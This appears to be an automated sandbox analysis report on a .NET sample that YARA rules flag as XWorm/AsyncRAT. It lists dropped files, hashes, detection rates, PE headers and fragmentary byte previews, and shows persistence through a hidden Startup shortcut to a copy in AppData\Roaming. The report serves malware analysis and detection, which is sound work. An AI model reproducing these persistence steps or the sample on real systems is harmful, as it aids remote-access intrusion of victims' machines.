                                                    Preview:MDMP..a..... .........#g.........................(...............2...........3......t^..v...........l.......8...........T...........Xq..!............C..........lE..............................................................................eJ.......F......Lw......................T.......t.....#g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER46FE.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):9316
                                                    Entropy (8bit):3.709279528754088
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJfHudElKL6YEISmgmfk4j/4tqprB89bmUmIfTDCm:R6lXJ2dElKL6YENmgmfkC4tZmVIfj
                                                    MD5:64B1D74B64E9D681CD421106322264AF
                                                    SHA1:F80388491594E8074206B1B0DA47F8C786824AC5
                                                    SHA-256:4DE91744FC15272F4444414C66DB4EA7FDC7D94F2BCCB4114A3CE0628122E447
                                                    SHA-512:9C101A7F0244123E96B0EA7DB6DEC3CECF44152A8DA061C73282537CBA4998ED4A46B2B599E3D44624E416E94C9481DDED785D317CC88FFF2A462A227445CA25
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.3.6.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER476D.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4928
                                                    Entropy (8bit):4.489075140735156
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsBJg771I9n/8WpW8VYmYm8M4JONO9SFr/yq8vRIO9vpSKrSxd:uIjfTI7A17VKJON5WGCpSYSxd
                                                    MD5:8005910752A3B3C24FEBAE93EB473E99
                                                    SHA1:355DB468FB063FEB698EC6B98DC3630C24D3E0DC
                                                    SHA-256:7AAADB2A3DC69E37334CE44F6E1853765FFCA69DF02384D23D1C48A2D04F923C
                                                    SHA-512:3BD31FD75091F0127BAF26EF8FB836289B89A486821C068E84FBA598458106E74322EE3E373106570670BD0A0ED9F2DD9C576B6C6519C5F5A45D570136C4669B
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="567962" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TJXpRilNkh.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Roaming\TJXpRilNkh.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):654
                                                    Entropy (8bit):5.380476433908377
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                    Malicious:true
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................

                                                    C:\Users\user\AppData\Local\Temp\Log.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    File Type:Generic INItialization configuration [WIN]
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):3.6722687970803873
                                                    Encrypted:false
                                                    SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                    MD5:DE63D53293EBACE29F3F54832D739D40
                                                    SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                    SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                    SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                    Malicious:false
                                                    Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vhrkizl.hze.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnr3mf5r.xku.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0zwcvow.gwj.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gcn5cwp2.nl0.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idz1z0tt.u4i.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igiwb250.hyz.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_irloizci.3hx.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kepp52vb.3u0.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mknoxajp.kba.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbrft2t1.pjc.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3jmfkpc.cyd.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3rgcjxd.zqo.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TJXpRilNkh.lnk

                                                    Download File
                                                    Process:C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 31 17:57:32 2024, mtime=Thu Oct 31 17:57:34 2024, atime=Thu Oct 31 17:57:34 2024, length=76800, window=hide
                                                    Category:dropped
                                                    Size (bytes):782
                                                    Entropy (8bit):5.1019328402194315
                                                    Encrypted:false
                                                    SSDEEP:24:8GOWQOk2fEH8qZ7wYh4p0RFUA8qYAn9m:8GOdOLXCwC4p0zj8qt
                                                    MD5:BBB527265F3254F20050F37C09667EA8
                                                    SHA1:D3DB1C8B8B35BAC39E890ABC4D790AFD69E27BE6
                                                    SHA-256:23BD8785E8FB497E187E38F767F190C8AEC27894BAFFB8B56C31A2998D799A12
                                                    SHA-512:E5A66475C05E1EB09841B042E2B6BCBBE59EFB9EA250D3B0DF38BBD03601DC238A7C21EBE7D60BE4134C0BBA0146991CCD6EFC344DFAE0C800C18C72832529C1
                                                    Malicious:false
                                                    Preview:L..................F.... ........+..W`...+..W`...+...,......................~.:..DG..Yr?.D..U..k0.&...&...... M......WR..+.......+......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl_Y......B.....................Bdg.A.p.p.D.a.t.a...B.V.1....._Y....Roaming.@......DWSl_Y......C.....................yF..R.o.a.m.i.n.g.....j.2..,.._Y2. .TJXPRI~1.EXE..N......_Y1._Y2............................o..T.J.X.p.R.i.l.N.k.h...e.x.e.......]...............-.......\.............)......C:\Users\user\AppData\Roaming\TJXpRilNkh.exe........\.....\.....\.....\.....\.T.J.X.p.R.i.l.N.k.h...e.x.e.`.......X.......120633...........hT..CrF.f4... .I.....,...W..hT..CrF.f4... .I.....,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                    C:\Users\user\AppData\Roaming\TJXpRilNkh.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):76800
                                                    Entropy (8bit):6.1355917903582196
                                                    Encrypted:false
                                                    SSDEEP:1536:pfJ0uhhgY+OGijd//2TJ17MZab2p7gSb3NzuNU5/nU6i6JbKcOOLepntw:pfJ0mYOGijd/eV1mab2Bjb3NzaU5FZOq
                                                    MD5:F19B33379B749F757BB47C0866AF8808
                                                    SHA1:A6C2232D04376CBE0CE75AC09BD7D86477B4A5DA
                                                    SHA-256:2AEBEDD83903B137349F36FFB767C5DDFAA5AA0168B980203895546FE71F2103
                                                    SHA-512:C19B8B2EA1F93E4D0639AABAD12BED369AE6CF198F5B0D8D471C64A1CBCEC4A1837CE93C5CBC86EE6A68BCA440CB2C0FA8FE5E7E963C18165FFA3AB01E173A11
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exe, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l."g................."...........@... ...`....@.. ....................................@..................................@..K....`............................................................................... ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H........f..........&.....................................................(....*.r...p*. *p{.*..(....*.r7..p*. G...*.s.........s.........s.........s.........*.rm..p*. .x!.*.r...p*. k)..*.r...p*.r...p*. ....*.rE..p*. .O..*..((...*.r...p*. [.x.*.r%..p*. 6V=.*"(....+.*&(....&+.*.+5sS... .... .'..oT...(,...~....-.(C...(9...~....oU...&.-.*.r!..p*. ....*.rW..p*. ....*.r...p*. ~.H.*.r...p*. ..e.*.r...p*. ....*.r/..p*. .._.*..............j..................sV..............~.........*

                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                    Download File
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.421664656643756
                                                    Encrypted:false
                                                    SSDEEP:6144:rSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:WvloTMW+EZMM6DFya03w
                                                    MD5:ECA8D4E48E92E43D3C88212B05CE0E09
                                                    SHA1:D036653CAE180F8EE8BB61D0B80159C3F056920F
                                                    SHA-256:B780099303FE63D568530158AAA1C2A5A21320870792C193ECD3D308FA3CAFF4
                                                    SHA-512:C974D22E83512AE62699E01284FC86E6C412D21C134149D7A8CF4DE2188CE68E70E86737F0B5EBEB88382BEB02EF53558AD3168183642E6F11C03C311A69E653
                                                    Malicious:false
                                                    Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmVQ...+..............................................................................................................................................................................................................................................................................................................................................6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.1355917903582196
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:TJXpRilNkh.exe
                                                    File size:76'800 bytes
                                                    MD5:f19b33379b749f757bb47c0866af8808
                                                    SHA1:a6c2232d04376cbe0ce75ac09bd7d86477b4a5da
                                                    SHA256:2aebedd83903b137349f36ffb767c5ddfaa5aa0168b980203895546fe71f2103
                                                    SHA512:c19b8b2ea1f93e4d0639aabad12bed369ae6cf198f5b0d8d471c64a1cbcec4a1837ce93c5cbc86ee6a68bca440cb2c0fa8fe5e7e963c18165ffa3ab01e173a11
                                                    SSDEEP:1536:pfJ0uhhgY+OGijd//2TJ17MZab2p7gSb3NzuNU5/nU6i6JbKcOOLepntw:pfJ0mYOGijd/eV1mab2Bjb3NzaU5FZOq
                                                    TLSH:5473AF487BE94521E2FE2FB45EF1B2629235F6139A13D71F24C402D51A33B8ACE117E6
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l."g................."...........@... ...`....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4140ce
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6722F76C [Thu Oct 31 03:20:12 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
